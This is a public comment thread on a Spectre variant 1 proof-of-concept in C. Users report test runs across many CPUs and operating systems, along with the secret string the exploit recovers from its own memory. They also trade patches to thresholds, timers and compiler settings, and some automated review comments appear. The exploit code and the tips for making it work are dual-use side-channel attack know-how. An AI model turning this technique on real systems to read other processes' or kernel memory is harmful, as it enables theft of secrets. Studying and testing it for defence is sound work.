@JonDaniel Its been made incredibly unclear up to now, but the kernel patches are reliant on microcode and potential BIOS/firmware updates that have yet to be released for increased protection against Spectre. The kernel patch itself should be protecting against Meltdown (assuming you have an affected CPU). RH have indirectly clarified this with : https://access.redhat.com/articles/3311301#architectural-defaults-9 With no microcode update available (our situation) we can update and reboot for Meltdown protection, and alleged variant 1 protection but no variant 2 protection. I thought though that this PoC was for variant 1, but my brain is getting more and more addled as these days go on... |
linxon
commented
Jan 5, 2018
•
• cirno-chan /tmp $ uname -a
Linux cirno-chan 4.9.49-gentoo-r1 #2 SMP Sat Dec 30 23:16:31 MSK 2017 x86_64 AMD FX(tm)-6300 Six-Core Processor AuthenticAMD GNU/Linux+
• cirno-chan /tmp $
• cirno-chan /tmp $ gcc -std=c99 -O0 spectre.c -o spectre 2> /dev/null
• cirno-chan /tmp $
• cirno-chan /tmp $ ./spectre
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfee18... Success: 0x54=’T’ score=1
Reading at malicious_x = 0xffffffffffdfee19... Success: 0x68=’h’ score=1
Reading at malicious_x = 0xffffffffffdfee1a... Success: 0x65=’e’ score=1
Reading at malicious_x = 0xffffffffffdfee1b... Success: 0x20=’ ’ score=1
Reading at malicious_x = 0xffffffffffdfee1c... Success: 0x4D=’M’ score=1
Reading at malicious_x = 0xffffffffffdfee1d... Success: 0x61=’a’ score=1
Reading at malicious_x = 0xffffffffffdfee1e... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfee1f... Success: 0x69=’i’ score=1
Reading at malicious_x = 0xffffffffffdfee20... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfee21... Success: 0x20=’ ’ score=1
Reading at malicious_x = 0xffffffffffdfee22... Success: 0x57=’W’ score=2
Reading at malicious_x = 0xffffffffffdfee23... Success: 0x6F=’o’ score=1
Reading at malicious_x = 0xffffffffffdfee24... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffffffffffdfee25... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfee26... Success: 0x73=’s’ score=1
Reading at malicious_x = 0xffffffffffdfee27... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfee28... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffffffffffdfee29... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffffffffffdfee2a... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffffffffffdfee2b... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfee2c... Success: 0x53=’S’ score=2
Reading at malicious_x = 0xffffffffffdfee2d... Success: 0x71=’q’ score=1
Reading at malicious_x = 0xffffffffffdfee2e... Success: 0x75=’u’ score=2
Reading at malicious_x = 0xffffffffffdfee2f... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffffffffffdfee30... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffffffffffdfee31... Success: 0x6D=’m’ score=2
Reading at malicious_x = 0xffffffffffdfee32... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffffffffffdfee33... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffffffffffdfee34... Success: 0x68=’h’ score=2
Reading at malicious_x = 0xffffffffffdfee35... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfee36... Success: 0x4F=’O’ score=2
Reading at malicious_x = 0xffffffffffdfee37... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffffffffffdfee38... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffffffffffdfee39... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffffffffffdfee3a... Success: 0x66=’f’ score=2
Reading at malicious_x = 0xffffffffffdfee3b... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfee3c... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffffffffffdfee3d... Success: 0x67=’g’ score=2
Reading at malicious_x = 0xffffffffffdfee3e... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffffffffffdfee3f... Success: 0x2E=’.’ score=2
• cirno-chan /tmp $
• cirno-chan /tmp $
• cirno-chan /tmp $ LANG="en_US" lscpu
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 6
On-line CPU(s) list: 0-5
Thread(s) per core: 2
Core(s) per socket: 3
Socket(s): 1
NUMA node(s): 1
Vendor ID: AuthenticAMD
CPU family: 21
Model: 2
Model name: AMD FX(tm)-6300 Six-Core Processor
Stepping: 0
CPU MHz: 3500.000
CPU max MHz: 3500.0000
CPU min MHz: 1400.0000
BogoMIPS: 7046.96
Virtualization: AMD-V
L1d cache: 16K
L1i cache: 64K
L2 cache: 2048K
L3 cache: 8192K
NUMA node0 CPU(s): 0-5
Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf eagerfpu pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core perfctr_nb cpb hw_pstate vmmcall bmi1 arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold |
array42
commented
Jan 5, 2018
•
|
-O2 and -O3 did not work for me. But -O1 and -O0 work with a Xeon X3450. But this poc does not work on another Intel Q9400 machine: Illegal instruction when compiled with gcc 4.8 and -march=native or -march=core2 or any tried architecture. Someone already mentioned, it does not work for his Q9300. |
citycat4
commented
Jan 5, 2018
|
@array42 try to use threaded version. Usually when non-threaded breaks with 'Illegal instruction', threaded works. |
eyes-0nly
commented
Jan 5, 2018
|
gcc (GCC) 7.2.1 20170915 (Red Hat 7.2.1-2)
And Intel(R) Pentium(R) CPU G3220 @ 3.00GHz
abhi-jha
commented
Jan 5, 2018
|
I am not getting the expected string. Any solutions?
Mr0maks
commented
Jan 5, 2018
ghost
commented
Jan 5, 2018
•
|
I tried to compile for ARM, but `#include <intrin.h>` /* for rdtscp and clflush */ is not available for ARM.
Does anyone have ideas on how to replace _mm_clflush on the ARM architecture? For __rdtscp, the two-thread counter approach from LionsAd above may work. |
DesmondFox
commented
Jan 5, 2018
Intel Pentium N3530. Windows 10 16299.192 |
hkmaly
commented
Jan 5, 2018
|
I got undefined reference to `_mm_clflush' when compiled without arguments and Illegal instruction with -march=native ... does it mean I'm not vulnerable or that I have compiler configured incorrectly?
Postrediori
commented
Jan 5, 2018
|
Fedora 27. Added space after
Everythg works. I also tried to launch it on the oldest CPU I have that is from 2004.
Unfortunately, it appears to lack |
prozacgod
commented
Jan 5, 2018
•
|
For shits and grins, I modified main to produce a hex dump starting 100 bytes before the Magic, and reads 1000 bytes of data. I played with other addresses but I'm not sure about ... what it's reading, as it's probably just reading from the current process memory space or something? (out of my depth on that bit) Also, not that I really expected anything different, it compiles and run under "bash for windows 10" just fine. Oh I reduced the hysteresis on the score, if it's just a higher score than the second ... I call it "good enough", I still see failures occasionally. if it's less than #2 it just prints a failure "--"
MGNute
commented
Jan 5, 2018
|
Visual Studio with and without /O2
AlessioCantina
commented
Jan 5, 2018
•
|
With @Symbian9's patches I get almost every letter incorrect on an Intel Core 2 Duo 2,66 GHz on macOS 10.11.6; after changing main to keep searching until the "Success" check passes I get a better result, but still not a perfect one.
zoobab
commented
Jan 5, 2018
|
@klugemonkey I tested successfully on an openvz container:
Now I am still looking at modifying the code to split between a client and a server, each of those in different containers. Stay tuned. |
kingsumos
commented
Jan 5, 2018
|
For older gcc versions (and mingw), here is an _mm_clflush() implementation, just copy/paste: static inline void _mm_clflush(volatile void __p) |
kingsumos
commented
Jan 5, 2018
•
|
If anyone wants to try this in PowerPC, check this gist: |
andrewdark1
commented
Jan 5, 2018
|
Online compilers - success |
vladern
commented
Jan 5, 2018
NightUnix
commented
Jan 5, 2018
•
|
FX8350 Centos 7 x64 |
KarelWintersky
commented
Jan 5, 2018
•
Compile as Result:
is my CPU absolutely vulnerable? |
diimdeep
commented
Jan 5, 2018
|
If you tried reading original pdf but stuck, recommend reading https://www.raspberrypi.org/blog/why-raspberry-pi-isnt-vulnerable-to-spectre-or-meltdown/ |
EXL
commented
Jan 5, 2018
Yes for Spectre. @NightActivity Try this patch for AMD FX/Ryzen:
-#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
+#define CACHE_HIT_THRESHOLD (140) /* assume cache hit if time <= threshold */
-for (tries = 999; tries > 0; tries--) {
+for (tries = 99999; tries > 0; tries--) { |
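Review bot: The whitespace change on the first line is the actual compile fix, not cosmetic: `#define CACHE_HIT_THRESHOLD(80)` declares a function-like macro whose parameter list is `80`, which is not a valid identifier and is rejected by compilers, whereas `#define CACHE_HIT_THRESHOLD (140)` defines the intended constant — worth saying so in the patch description since several people in this thread hit the same error. The value 140 itself is a per-machine guess; timing a known cache hit and a known miss with the same rdtscp loop at startup and placing the threshold between them would make the PoC work across the AMD parts listed here without a source edit. Raising `tries` to 99999 multiplies the per-byte work by 100, which is a trade-off rather than a fix — acceptable only if the result loop still exits early once a clear winner emerges, which this hunk does not show. The surrounding `readMemoryByte` body is outside the hunk.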
Eliastik
commented
Jan 5, 2018
•
|
AMD FX 6300@3.5 GHz on Ubuntu 17.10 (kernel 4.13.0-21-generic) Changes:
Compilation: Execution:
EDIT: With changes from the previous comment:
dimhotepus
commented
Jan 5, 2018
•
|
As already suggested, tune up And claim it is vulnerable, too.
-#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
+#define CACHE_HIT_THRESHOLD (90) /* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
static int results[256];
- int tries, i, j, k, mix_i, junk = 0;
+ int tries, i, j, k, mix_i;
+ unsigned int junk = 0;
volatile uint8_t * addr;
printf("0x%02X=’%c’ score=%d ", value[0],
- (value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
+ (value[0] > 31 && value[0] < 127 ? value[0] : (uint8_t)'?'), score[0]); |
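Review bot: The printf conditional previously had `value[0]` (an integer) in one arm and the string literal `"?"` (a pointer) in the other, a constraint violation that compilers reject, so `(uint8_t)'?'` is the real compile fix in this hunk; the cast is unnecessary because both arms are promoted to int for `%c`, and plain `'?'` reads cleaner. The `junk` change to `unsigned int` presumably matches the `unsigned int *` aux argument that `__rdtscp` takes; a one-line comment such as `/* __rdtscp stores TSC_AUX through an unsigned int * */` would keep it from being reverted as a no-op. As with the other threshold patches in this thread, 90 is a per-machine constant, and measuring hit versus miss latency at startup would avoid hand-tuning it. `readMemoryByte` continues outside the hunk.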
blackjec69
commented
Jan 5, 2018
|
People, if this code doesn't work, compile it with the options "-m32 -march=pentium4 -O0" and change CACHE_HIT_THRESHOLD to 100 or above. |
michael-brade
commented
Jan 5, 2018
|
I have the same question @ssstonebraker has: is there any C code like this to prove that meltdown is fixed on a patched system? In particular, I would like to test if a grsecurity system needs patching or not. Since grsecurity is only available on 4.9.x kernels, and not available publically for later kernels, I suppose that even once KPTI will be available for 4.9.x, the grsecurity patches won't apply anymore. Then the question becomes: what is more valuable, KPTI or grsecurity? |
jpmorrison
commented
Jan 5, 2018
•
|
@progman32 tried on a Core2 Duo with _rdtsc() and only a few characters are recovered. Intel says 2nd gen Core and newer are vulnerable.
BatteryDie
commented
Jan 5, 2018
|
Tried code on Intel i5-6600k with WSL. Here is my result:
Symbian9
commented
Jan 6, 2018
|
@michael-brade asked: "I have the same question @ssstonebraker has: is there any C code like this to prove that meltdown is fixed on a patched system?" Here is a simple shell script to check it ;-) |
ewheelerinc
commented
Jan 6, 2018
•
|
Running this under KVM I get the following, but it works fine on the hypervisor:
using this CPU model:
Am I missing something? |
kuleszdl
commented
Jan 6, 2018
|
@ewheelerinc did you compile spectre on the host with |
alexram2
commented
Jan 6, 2018
•
|
Works fine when reading from its own memory, but not when reading from another application.
Create simple program
Run test program
Run spectre with agrs in other console.
plukawski
commented
Jan 6, 2018
|
I have a question for those, who were able to reproduce that on AMD processors: Did you have to enable eBPF JIT for this exploit to work, or it just worked on standard system config? |
luisfarzati
commented
Jan 6, 2018
•
|
MacBook Pro (Retina, 13-inch, Early 2015) running macOS High Sierra 10.13.2
plukawski
commented
Jan 6, 2018
•
|
From what I see this PoC tries to read the secret from within its own process address space. The virtual address of the other process, even when passed as the first argument would mean nothing for the process executing this exploit. |
jms19
commented
Jan 6, 2018
|
Works fine on an (AMD) X II 250. |
dude-awesome
commented
Jan 6, 2018
|
Can‘t test it right now but will this also run on latest Intel Coffee Lake ? |
eimann
commented
Jan 6, 2018
•
|
SunOS hostname 5.11 joyent_20171109T032417Z i86pc i386 i86pc on Intel(R) Xeon(R) CPU E5620 @ 2.40GHz unmodified:
threshold set to 100
dimhotepus
commented
Jan 6, 2018
•
|
@plukawski, for me (exploited AMD)
Anyway, that's Spectre variant 1 from https://googleprojectzero.blogspot.com.by/2018/01/reading-privileged-memory-with-side.html
Correct me if i am wrong, but since we read same process address space and do not use eBPF JIT, its state is irrelevant. |
dimhotepus
commented
Jan 6, 2018
|
@alexram2 Correct me if i'm wrong, its due to virtual memory. Address you got in victim process is a virtual address, not a physical one. |
hardhub
commented
Jan 6, 2018
|
Threshold 150 AMD Phenom II X4 965 AMD FX-8320 Intel i7-6700 Intel Xeon 1230 v2
plukawski
commented
Jan 6, 2018
|
@dimhotepus, |
vladsf
commented
Jan 6, 2018
|
Fails on Core2 duo, OSX: $ sysctl -n machdep.cpu.brand_string $ ./spectre.out |
bnraggie
commented
Jan 6, 2018
•
|
@jamver Thanks for your updated source code! I tried it on my 3GHz iMac Intel Core 2 Duo, OSX 10.10.5 but the result I got was |
fleroviux
commented
Jan 6, 2018
|
Worked flawlessly on an Intel i7-3610QM with default threshold (80). Maybe will test on an AMD Phenom II X4 965 BE later. |
Create-personal
commented
Jan 6, 2018
|
@vladsf, @bnraggie `#include <stdio.h> /******************************************************************** char * secret = "The Magic Words are Squeamish Ossifrage."; uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ void victim_function(size_t x) { /******************************************************************** /* Report best guess in value[0] and runner-up in value[1] */ for (i = 0; i < 256; i++)
} int main(int argc, for (i = 0; i < sizeof(array2); i++) printf("Reading %d bytes:\n", len); |
coypoop
commented
Jan 6, 2018
|
For reproducing on an AMD Opteron running NetBSD-8.0 I changed 'rdtscp' with 'mfence; rdtsc'. |
klm366k
commented
Jan 6, 2018
|
To emulate RDTSCP/CLFLUSH wihout MSVC in old C compiler like Borlad C, Borland CBuilder etc. //**************** rdtscp MSVC emulate ************************ unsigned __int64 rdtscp (unsigned int *Aux)
result = (((__int64)cycles_high << 32) | cycles_low ); } |
JohnTroony
commented
Jan 6, 2018
Bengt
commented
Jan 6, 2018
|
I can confirm the modifications of Erik August working on a Phenom II X6 1090t @ 6 x 3.0 GHz under Ubuntu 16.04.3. |
FacundoAreo
commented
Jan 7, 2018
•
|
@Hey
#gcc -march=native spectre.c
# Thanks all lot !!! |
ghost
commented
Jan 7, 2018
|
[root@s3rgp4rody-fedora PROGRAMMING]# gcc --std=c99 vuln_test.c -o spectre
[root@s3rgp4rody-fedora PROGRAMMING]# ./spectre
[root@s3rgp4rody-fedora PROGRAMMING]# cat /proc/cpuinfo
ghost
commented
Jan 7, 2018
|
[root@localhost SERGBACKUP]# gcc --std=c99 vuln_test.c -o spectre
[root@localhost SERGBACKUP]# ./spectre
[root@localhost SERGBACKUP]# cat /proc/cpuinfo
ghost
commented
Jan 7, 2018
|
[root@localhost-live SERGBACKUP]# gcc --std=c99 vuln_test.c -o spectre
[root@localhost-live SERGBACKUP]# ./spectre
[root@localhost-live SERGBACKUP]# cat /proc/cpuinfo
EgZvor
commented
Jan 7, 2018
•
|
Reproduced
ghost
commented
Jan 7, 2018
[root@localhost-live SERGBACKUP]# ./spectre
[root@localhost-live SERGBACKUP]# cat /proc/cpuinfo
aidenatt
commented
Jan 7, 2018
|
Just tested this on a dual Opteron 6128 machine, and it seemed to work fine. root@pve:~# ./spectre
root@pve:~# lscpu
Mno-hime
commented
Jan 7, 2018
|
OpenIndiana 2017.10 (illumos-1d443a9338 kernel) on i7-3610QM (as well as OpenIndiana as a Linux KVM VM):
michael-brade
commented
Jan 7, 2018
|
@Symbian9 hehe, nice try :) But that whole script is probably more of a joke... I know when I compiled my kernel with KPTI, but that doesn't mean it's effective. I want to actually test and verify that it works. Such a script seems not to be available :(( |
Leohige
commented
Jan 7, 2018
|
Ubuntu 16.04, i5 4200u Reading 40 bytes: |
j3k00
commented
Jan 7, 2018
•
MachineUbuntu 17.10 CPU
Changes
Compilation:
Output
veita
commented
Jan 7, 2018
|
Works with Silvermont/Linux 4.14.7 (
MWisBest
commented
Jan 7, 2018
|
Confirmed working on an AMD A10-4600M (family 15h model 10h, Trinity/Piledriver) with up-to-date Windows 10 64-bit. Required a few misc changes to compile with MSVC but those have mostly been mentioned already. RDTSCP works as-is because it waits for all preceding instructions to complete before it reads the counter (it is not a fully serializing instruction like CPUID, but that ordering is enough for this timing loop); for better compatibility RDTSC can be used with fences to get the same ordering, i.e.:
All three fence types (lfence, sfence, mfence) are working for me... I was under the impression sfence and lfence were not serializing. lfence is much faster than sfence and mfence; sfence and mfence required increasing the cache hit threshold. cpuid also works for serialization but is slower than all fences, but it has the potential advantage of not needing SSE2. Using a fence instead of the delay loop in the training run did not work reliably, and a separate thread counter was also unreliable for me. Of course this entire mess is mitigated with a fence after the |
Bahat159
commented
Jan 8, 2018
•
|
Windows 10 Name For those of you still having problem compiling the code on windows "Remove the braces around CACHE_HIT_THRESHOLD (80) to CACHE_HIT_THRESHOLD 80, for it will compile successfully. |
JensAndree
commented
Jan 8, 2018
|
Confirmed working on older i7-3630QM Fujitsu laptop running built in Ubuntu, all latest patchlevel. $ lscpu $ gcc -std=c11 -o spectre spectre.c $ ./spectre |
bparinas
commented
Jan 8, 2018
|
no fix yet? ubuntu@jenkinsci:~$ ./spectre ubuntu@jenkinsci:~$ lscpu |
josephapg
commented
Jan 8, 2018
|
Intel Core i3-6006U Result 1 (/Od)Compile options:
Result 2 (/O2)Compile options:
ewheelerinc
commented
Jan 8, 2018
|
Actually it was compiled on the guest where it doesn't work and then copied to the host (hypervisor) where it does work. So its definitely not an -mnative thing. I just did gcc -std=c99 -o spectre spectre.c so nothing special. Is it possible that I've disabled a guest instruction needed to do the exploit? That would be neat. Here's GDB:
So apparently rdtscp doesn't work. Is there another way to get high resolution time enough to exploit this bug without rdtscp? |
ewheelerinc
commented
Jan 8, 2018
|
@kuleszdl and everyone else: Well I was able to do this with clock_gettime and nanosecond resolution just fine in that KVM with a missing rdtscp: Just put this at the top of the code somewhere:
and then compile like so: It produced the following:
ewheelerinc
commented
Jan 8, 2018
|
Surprisingly, it works with usec resolution with gettimeofday:
You can even reduce the precision to 10us (instead of 1us) like so, but then you need to increase tries to about 3000:
Further reducing precision to 100us requires about 20000 or 30000 tries per byte to get good output:
rwestergren
commented
Jan 8, 2018
quadpixels
commented
Jan 9, 2018
•
|
Did a sweep over the Cache Hit Threshold, both when optimization flag is turned on and off, on 2 processors, the AMD A4-5000 and Intel i5-4570 (the __rdtscp is replaced with a _mm_mfence() and a __rdtsc() b/c it makes results on the A4-5000 look more obvious). It seems that a threshold of 100~400 cycles works well for the A4-5000 with optimization turned off; a threshold of 60~260 cycles works well for i5-4570, when only the spectre is running, as having other programs exercising the cache may affect results as well. |
ECJ70
commented
Jan 9, 2018
|
Hi, Output is: Not sure if the program works as expected, there are some warnings when compiling with MS visual studio 2017. Maybe that´s the problem. |
aikoncwd
commented
Jan 9, 2018
|
@ECJ70 Line 135, swap "%c" to '%c', also in "?" into '?' |
42Bastian
commented
Jan 9, 2018
|
I tried it on a Cortex-A9 (ZYNQ 7000) in an RTOS task, but no success so far. ARM Ltd. states the CA9 is vulnerable to Spectre, so maybe I need to tweak some of the constants (which I do not yet quiet understand). |
ECJ70
commented
Jan 9, 2018
|
@aikoncwd I´m getting closer, just have to play a little bit around with the treshold value. Reading at malicious_x = FFFFF0E8... Unclear: 0x0E='?' score=59 (second best: 0x04 score=59) |
ECJ70
commented
Jan 9, 2018
|
Results maybe dependent on CPU-load. Reading 40 bytes: |
kingsumos
commented
Jan 9, 2018
|
@ssstonebraker @michael-brade @Symbian9 |
tosha13
commented
Jan 9, 2018
•
|
Lenovo L450 antony@antony-L450: |
goranskular
commented
Jan 9, 2018
|
i8700k with 4.15.0.994 kernel Reading 40 bytes: |
brunoczim
commented
Jan 9, 2018
|
Could anyone actually read addresses from other processes?
asm
commented
Jan 9, 2018
|
I noticed the cache timing method in this PoC is just using the fastest read time to pick the byte value. While this works most of the time, it's not always the most accurate. For fun, I used a neural network to pick the correct byte value and pushed the code here: https://github.com/asm/deep_spectre. Here's example output: ./spectre.py
Using TensorFlow backend.
Collecting training data...
Scaling data between 0-1...
Training deep model...
Train on 48000 samples, validate on 16000 samples
Epoch 1/10
48000/48000 [==============================] - 4s 83us/step - loss: 2.9168 - acc: 0.3363 - val_loss: 0.7985 - val_acc: 0.8276
Epoch 2/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.4543 - acc: 0.9007 - val_loss: 0.3505 - val_acc: 0.9204
Epoch 3/10
48000/48000 [==============================] - 4s 75us/step - loss: 0.2802 - acc: 0.9367 - val_loss: 0.2825 - val_acc: 0.9335
Epoch 4/10
48000/48000 [==============================] - 3s 73us/step - loss: 0.2516 - acc: 0.9441 - val_loss: 0.2948 - val_acc: 0.9293
Epoch 5/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.2368 - acc: 0.9451 - val_loss: 0.2640 - val_acc: 0.9361
Epoch 6/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.2320 - acc: 0.9460 - val_loss: 0.2765 - val_acc: 0.9360
Epoch 7/10
48000/48000 [==============================] - 3s 73us/step - loss: 0.2405 - acc: 0.9458 - val_loss: 0.2588 - val_acc: 0.9376
Epoch 8/10
48000/48000 [==============================] - 4s 74us/step - loss: 0.2324 - acc: 0.9468 - val_loss: 0.2502 - val_acc: 0.9403
Epoch 9/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.2269 - acc: 0.9474 - val_loss: 0.2452 - val_acc: 0.9408
Epoch 10/10
48000/48000 [==============================] - 3s 72us/step - loss: 0.2277 - acc: 0.9467 - val_loss: 0.2663 - val_acc: 0.9392
The secret message is: The Magic Words are Squeamish Ossifrage. |
pavlinux
commented
Jan 9, 2018
|
./a.out ... |
moonsyi
commented
Jan 10, 2018
ghost
commented
Jan 10, 2018
|
AMD Phenom 9950 Quad-Core: |
MarkJurich
commented
Jan 10, 2018
•
|
FYI: To compile/link/run under Win7x64 & Visual Studio 2010, create a C++ Win32 Console Project (uncheck pre-compiled header check box), save as a .c source file, stay under "Debug" (no code optimization) vs "Release", and be aware of the following source code changes, depending if you start with this source or the original spectre.pdf research paper source (Copy & Pasted): Legend: This Source Line Number(Original PDF Paper Source Line Number): OriginalStringSegment --> NewStringSegment // Comment --( 13): */ --> */ // Copy & Paste from the Original PDF Source might need fixup at the end of comment The created .exe (I called it Spectre.exe) should run in a Command Window. I tested two up-to-date Win7x64 Systems, with the following CPUs, and Positive Results: Intel(R) Core(TM) i5-3320M CPU @ 2.60GHz (Ivy Bridge) lenovo X230 The i5 had the (KAISER) Windows Update for MeltDown/Spectre, which doesn't do anything to stop this variant of Spectre. I'm still waiting for any possible firmware updates to apply to either system. On the i5 (yesterday), I played with the Cache Hit Threshold from about 25 up to 200 with Positive Results, if I recall correctly. |
nuvvanda
commented
Jan 10, 2018
|
I need some clarification. The spectre attack reads memory used by OTHER process that itself. In the example here the compiled executable file is reading ITS OWN memory trying tho show the secret word. I don't get it. |
MarkJurich
commented
Jan 10, 2018
•
|
You are exactly right. This example is a simple demonstration of how the attack works. If you read the research paper (spectre.pdf), there are descriptions of how it might be deployed via the web and against another application. This example attacks its own code to show how it works, in principle. It never reads the string architecturally: it trains the victim's bounds check with in-range indices, has the victim speculatively execute its array access with an out-of-bounds index that points at the secret, and then times cache accesses to recover which value was loaded, one byte at a time. Hope this helps. |
HenkPoley
commented
Jan 10, 2018
•
|
@moonsyi yes, the process internal variant of Spectre (as in this PoC) will probably never be patched. If you want to keep some data secure from a piece of untrusted running code, you should move it outside the piece of code's process. The patches that you are running protect against 'remote sensing' of memory from other processes, and 'remote sensing' of kernel memory. |
42Bastian
commented
Jan 10, 2018
@MarkJurich: No OS fix can mitigate this specific exploit as it runs in the process address space. |
MarkJurich
commented
Jan 10, 2018
What you say is correct, but I don't think my postings challenged that. If it appeared that way, my dearest apologies... Spectre Attacks (in the research paper) can be Inter-Application (not necessarily targeting the kernel directly). Windows Updates are not restricted to OS Fixes. Firmware Updates can address some forms of attack. Software Patching (especially Signature Identification) can address immediate concerns. Is this going to stop Spectre Attacks completely? Absolutely not (as the research paper alludes to). New Processor Designs eventually should... ... I would never say this code is reading kernel data. I mentioned that it attacks itself as a demonstration. What we do know at this time is that to start guarding against these forms of attacks (short of a new processor design), there will be much CPU overhead, and that overhead will depend on your current processor. I've read reports that machine slowdowns of as much as 30% may occur with such solutions as speculation fencing, and that is what we have to look forward to in the near future... Intra-Application Spectre Attacks address the core flaw in Processor Design. Let's hope we can work together to protect against Spectre until machines/boxes get replaced due to attrition, etc. |
MarkJurich
commented
Jan 10, 2018
Information on Spectre [1] Spectre Attacks: Exploiting Speculative Execution [2] Google Project 0 Blog |
Menny11
commented
Jan 11, 2018
in order to compile the code for my Core 2 duo e8500 in windows 10 x64 I used |
apps4u
commented
Jan 11, 2018
I'm running on macOS 10.13.2, and I was able to get the secret with a cache threshold as low as 40. But that is not the reason for this post: I installed the fix Apple released today that is meant to fix this issue, but I can still use this to get the secret. https://support.apple.com/en-au/HT208397 That is the link to the Security Update that was said to fix Spectre, but it has not. |
MarkJurich
commented
Jan 11, 2018
Have you seen this post about possibly fencing the timer calls to ensure serialization?: ... That's all I can think of, at the moment. | I was able to get results using an older Intel Penryn CPU and created a code fork in the repository. This code uses a suggestion made earlier: |
MarkJurich
commented
Jan 11, 2018
Perhaps the security update in question prevents Inter-Application Spectre Attacks but is ineffective against Intra-Application Spectre Attacks? If that is the case, it is effectively preventing the worst type of Spectre Attacks, which is a good thing. Unfortunately, no one has published a working Spectre Attack Example on a secure/privileged segment, as far as I know, so it would be difficult to test. This code is supposed to accept command arguments to possibly allow this, but no one has gotten it to work or shown a working example, that I know of... It will be much more difficult to prevent this example code that attacks itself, as mentioned earlier... ... Sorry I can't help further, but thought I should comment. Thanks for bringing the update to our attention, though. Perhaps someone else with more knowledge will comment soon. | Answered better in: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2317924 |
aoprea1982
commented
Jan 11, 2018
aoprea1982
commented
Jan 11, 2018
spartanthe
commented
Jan 11, 2018
Description: macOS High Sierra 10.13.2 Supplemental Update includes security improvements to Safari and WebKit to mitigate the effects of Spectre (CVE-2017-5753 and CVE-2017-5715). They rolled out updates for the browser, not native apps. |
unzueta
commented
Jan 11, 2018
mikorist
commented
Jan 11, 2018
alexs77
commented
Jan 11, 2018
Doesn't compile here on Ubuntu 16.04 with gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.5).
MarkJurich
commented
Jan 11, 2018
It looks like the rdtscp function requires at least one argument. The original source used "&junk" as the argument. I think if you put that back in everywhere, those errors will go away. Under Win7x64/MSVS2010, I had to define junk as an unsigned int instead of int. See my previous post for other fix-ups that might lead to a clean compilation: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2316763 |
MarkJurich
commented
Jan 11, 2018
@unzueta: Thanks for the info about Windows Defender/AV blocking it. It looks like we'll have to get a bit fancier, allowing us to continue testing with it, since MS is already kicking in Signature Detection. |
freakynit
commented
Jan 11, 2018
I was able to recover completely
adrb
commented
Jan 11, 2018
Architecture independent version, tested on ARM Allwinner H3 (not vulnerable) and Intel i7 (vulnerable): https://github.com/adrb/public/tree/master/linux/spectre_multiarch |
kuleszdl
commented
Jan 11, 2018
@ewheelerinc thanks for the update. As expected, it works inside VMs as well. If you got a patched KVM-Host (e.g. CentOS7) and a non-patched VM (e.g. Debian stable), could you please test if it's still exploitable in the VM? (I expect it is...) |
kuleszdl
commented
Jan 11, 2018
@adrb: The Allwinner H3 uses cortex A7 cores, but it's good to confirm ARM's report about A7 not being affected. |
michael-brade
commented
Jan 11, 2018
@kingsumos very nice find indeed! thank you! |
adrb
commented
Jan 11, 2018
@kuleszdl, well yes, I just had it at hand to test ;) But, as I mentioned, with that mod you can test all kinds of architectures supported by Linux. |
carlosdamazio
commented
Jan 12, 2018
Had to tweak a little bit. 1 - PS: I'm not a low-level kind of guy, bear with me. Got the expected output, which is kind of worrying, but no point to worry about it anyways. We're fucked. |
rhalff
commented
Jan 14, 2018
Strange, works for me although I have the intel-microcode patch already installed on ubuntu: https://usn.ubuntu.com/usn/usn-3531-1/ |
hazg
commented
Jan 18, 2018
Intel(R) Core(TM) i3 CPU 540 @ 3.07GHz Reading 40 bytes: AMD A8-4500M APU with Radeon(tm) HD Graphics Reading 40 bytes: |
HenkPoley
commented
Jan 19, 2018
@rhalff The microcode does not fix within-process Spectre exploitation. It only adds instructions for the OS to reset the branch predictor when switching between processes. Full mitigation of within-process Spectre would require disabling branch prediction altogether, leading to pre-2013 Intel Atom speeds, at approximately 1/6th of the performance you have now. |
spartanthe
commented
